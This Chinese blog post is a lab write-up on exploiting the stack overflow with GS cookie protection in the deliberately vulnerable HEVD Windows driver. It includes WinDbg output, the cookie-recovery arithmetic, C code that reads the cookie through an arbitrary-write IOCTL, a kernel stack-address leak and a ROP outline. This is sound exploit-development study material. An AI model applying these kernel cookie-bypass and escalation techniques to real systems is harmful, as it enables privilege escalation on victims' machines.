【Win Pwn】HEVD-内核栈溢出GS保护及绕过
HEVD中的栈溢出加上GS保护
还有一个知识点就是windows内核栈地址泄露
函数功能
在上三篇中讲的很清楚了,这里我关闭了KVAS
又是一段经典的栈溢出,但是有了内核的GS保护
编写exploit
这里就不得不提到Windows中一种Cannary的绕过方式了,通过try except的Handler进行绕过,很遗憾handler只在32位程序中才保存在栈上
查阅资料
https://paper.seebug.org/2017/#22
https://kristal-g.github.io/2021/02/07/HEVD_StackOverflowGS_Windows_10_RS5_x64.html
cookie值是存储在_data段的第一个
函数检查的部分,有一个异或
1 | 1: kd> dqs rsp |
-
利用之前的
ulGetBase得到HEVD.sys的基地址1
2
30: kd> dqs 0xfffff80522fe0000+3000
fffff805`22fe3000 00006fd9`604347b3
fffff805`22fe3008 ffff9026`9fbcb84c再下断点看看是不是为这个值
1
2
3
4
5
60: kd> g
Breakpoint 0 hit
HEVD!TriggerBufferOverflowStackGS+0x1b:
fffff805`230666fb 4833c4 xor rax,rsp
1: kd> r rax
rax=00006fd9604347b3还真是,那么访问
base+3000就可以得cookie值 -
如何读取?这个还真没办法,只能利用另外一个漏洞
HEVD_IOCTL_ARBITRARY_WRITE,将该值修改为我们自己的值,也可以设置Ring3ToKernel中的一个地址的值为待写入的地方,然后利用这个漏洞将cookie写入 -
key值位于rsp上,利用NtQuerySystemInformation中的PSYSTEM_EXTENDED_PROCESS_INFORMATION可以得到,但是后面又看不了了,这个时候我想了下,一个exp可以看到另外一个exp的栈地址,但是查看自身的时候已经不在上面了,或许改为线程执行可以?
就用这种方法试试看
1
2[+] Found Ring3ToKernel.exe
Stack base 0xffffef8360dce000 Stack limit 0xffffef8360dc8000
偏移是一个定值,再回忆一下之前的cookie生成算法就能得cookie了
但是有个小问题,合成cookie时,rsp值变化了
考虑到push和sub所以:rsp = stack base - 0x868 - 0x258此实,key值为:0000768c469d2a88,rsp = ffffef83619aa798,
1
2>>> hex(0x0000768c469d2a88^(0xffffef83619aa798-0x258))
'0xffff990f27078fc8'得到cookie值为
0xffff990f27078fc8
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18printf("[*] Cookie Address 0x%llx\n",cookie_addr);
printf("[*] Atribute Write GET key value\n");
typedef struct _WRITE_WHAT_WHERE
{
funcaddr* What;
funcaddr* Where;
}arbitrary_write, * pArbitraryWrite;
funcaddr value = 0;
pArbitraryWrite payload = (pArbitraryWrite)malloc(sizeof(arbitrary_write));
payload->What = (funcaddr*)cookie_addr;
payload->Where = &value;
DWORD size = sizeof(payload);
DWORD info = NULL;
DeviceIoControl(hDevice, 0x22200B,
payload, size,
NULL, 0,
&info, NULL);
printf("[*] Key value 0x%llx\n", value); -
然后就是经典常规栈溢出+ROP打法
1 | void StackOverflowGS(HANDLE hDevice, unsigned int ioctl) { |
微调exploit
-
shellcode得仔细调整rsp值
很简单,和最开的是栈溢出一样,直接一个push两个ret,让rsp+0x28变成了rsp+0x10
-
还有就是泄露内核栈地址的时候得稳定,让其包含当前进程
我的解决方法简单粗暴,多线程和直接加
system("pause");,重新弄好的方案都能打包成一个函数了1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20unsigned long long ulUseStackInfo(wchar_t ProcName[]) {
pStackInfo stackinfo = (pStackInfo)malloc(sizeof(StackInfo));
if (stackinfo == NULL) {
printf("[!] Can't allocate memory\n");
return 0;
}
stackinfo->ModuleName = ProcName;
stackinfo->result = 0;
HANDLE hThread = CreateThread(NULL, 0x100, (LPTHREAD_START_ROUTINE)ulGetStackLimit, stackinfo, NULL, NULL);
if (hThread == NULL) {
printf("[!] Can't get thread\n");
return 0;
}
system("pause");
WaitForSingleObject(hThread, INFINITE);
funcaddr baseaddr = stackinfo->result;
CloseHandle(hThread);
free(stackinfo);
return baseaddr;
}
最终exp
1 | void StackOverflowGS(HANDLE hDevice, unsigned int ioctl) { |
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
Related Articles
2025-04-16
【Win Pwn】Windows10 内核池溢出
内核也太难了,主要讲述大NonPagedPool的溢出利用 公众号:https://mp.weixin.qq.com/s/XjaPdNwqABFqDZsZTDtZJg 或许我们的公众号会有更多你感兴趣的内容 【复现】Windows10 内核池溢出 前置知识: windows内核调试 windows内核提权基础 简单的windows驱动编写(hello world级别) linux pwn堆溢出利用方式 一点点数据结构的知识(双向链表) 文章讲述并复现在Windows高版本内核中NonPagedPoolNx溢出的利用方法 目录 [toc] 利用方式 很多资料都是直接翻译外文文献,翻译质量差,没有直接的实操,并且随着windows的更新,比较缺乏现代windows 10\11的、比较易学的攻击方式。这里使用:Windows-Non-Paged-Pool-Overflow-Exploitation[1]作为基础的讲解,原文中的图示个人感觉还是讲的不够透彻,这里个人借着原文重新讲述下。 命名管道介绍 这是windows提供的用于进程间通讯的一种机制。首先是**服务...
2024-02-23
【Win Pwn】HEVD-任意地址写
非预期方法,暂时不会放出来 HEVD练习-任意地址写 漏洞点 一点好玩的 传入一个结构体,得到结构体过后写入内容 结构体 12345typedef struct _WRITE_WHAT_WHERE{ unsigned int* What; unsigned int* Where;}arbitrary_write, *pArbitraryWrite; 这里我做一个比较有意思的事儿,比如修改某个变量的值 1234567891011121314151617181920printf("[*] Start Exploit\n");pArbitraryWrite payload = (pArbitraryWrite)malloc(sizeof(arbitrary_write));if (payload == NULL) { printf("[!] Malloc payload failed\n"); return;}int vuln = 0x10000;int pay = 0xDEADBEEF;prin...
2024-01-25
【Win Pwn】HEVD-内核栈溢出(下)
上:https://joe1sn.eu.org/2024/01/25/win-hevd-exp-stackoverflow-I/ 中:https://joe1sn.eu.org/2024/01/25/win-hevd-exp-stackoverflow-II/ 文章已在先知社区投稿:https://xz.aliyun.com/t/13365 本附录对第二章的以下几个遗留问题做出说明 user编程寻找ROPGadget shellcode编写 Token提权 KVAS user编程寻找ROPGadget ROP全称加返回导向性编程,比如这一章用到的Gadget 12345pop rcxretmov cr4, rcxret 关于ret汇编本质上就是从栈帧中取出值,然后将ip寄存器设置为该值,等价于pop ip,这样就能完成函数调用的返回等等。 本章中当我们发生栈溢出时,就会把ret的位置设置为第一段gadget的位置 pop rcx就会将此时栈顶的值0x00000000002506f8存入rcx寄存器,然后ret又从栈顶取出地址mov_rc4_rcx_ret,然后rip寄...
2024-01-25
【Win Pwn】HEVD-内核栈溢出(中)
在上一篇中了解了与内核的交互模式,这里就可以开始做HEVD了 文章已在先知社区投稿:https://xz.aliyun.com/t/13364 编写交互模块 A. 计算IO_CTL值 其实不用这步,但是可以当作更多的了解 在之前的交互中有这么一条定义功能号 1#define IOCTL_MUL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x9888, METHOD_BUFFERED, FILE_ANY_ACCESS) 但是…HEVD逆向会发现是这样的 发现CTL_CODE也是个宏定义 123#define CTL_CODE( DeviceType, Function, Method, Access ) ( \ ((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \) 其中,这里 DeviceType -> FILE_DEVICE_UNKNOWN = 0x22 Function ->...
2024-01-25
【Win Pwn】HEVD-内核栈溢出(上)
开始做HEVD来熟悉windows的内核漏洞利用方式时,发现大多数的资料依旧基于windows7,但是目前主流的操作系统已经是win10,所以还是得更上时代潮流的 文章已在先知社区投稿:https://xz.aliyun.com/t/13363 0. 前置环境 更基础 WIndows10 Vmware虚拟机 Visual Studio 2019,有WDK Windbg Preview(我用单纯是觉得更好看) 最重要的HEVD项目:https://github.com/hacksysteam/HackSysExtremeVulnerableDriver,我直接下载的3.00 Release版 我使用的Windows版本是 I. 编程环境 如果你想快速搭建一个驱动开发环境可以参考B站上的一些资料,如:配置驱动开发环境 如果按照步骤vs没有KernelModDriver这一模板,找到vs目录的WDK.vsix双击即可 一段驱动的主要代码,在main.cpp中编写 123456789101112131415161718192021#include <ntifs.h>...
2024-03-19
windows内核驱动 5-中断级与自旋锁
顺便复习操作系统了 WinOS 相关原理 中断级 如果有时间的话可以试着玩一玩这个游戏:https://github.com/plbrault/youre-the-os 在线:https://plbrault.github.io/youre-the-os/ 或许在游玩的过程中你会自己总结出一套操作系统进程调度的一套方法,便于其他方法的理解 调度方式:抢占式 最小执行单元:纤程->线程->进程 中断级( Irql ) 0->2级别越来越高,高级别可以打断低级别 0:Pass level 1:Apc level 2: Dpc level ISR延迟调用,硬件中断后,不那么紧急的任务放在DPC队列中 DPC访问换页内存,页面换到磁盘中pagefile.sys,引起换页缺页中断,如果换页中断无法打断DPC,然后就会访问无效地址,造成BSOD,所以DPC中最好不要使用换页内存,也即要使用nonpagedpool,而不要使用paged pool hardware(io…) 强制打断:ipicall 自旋锁 有一间厕所,A进...
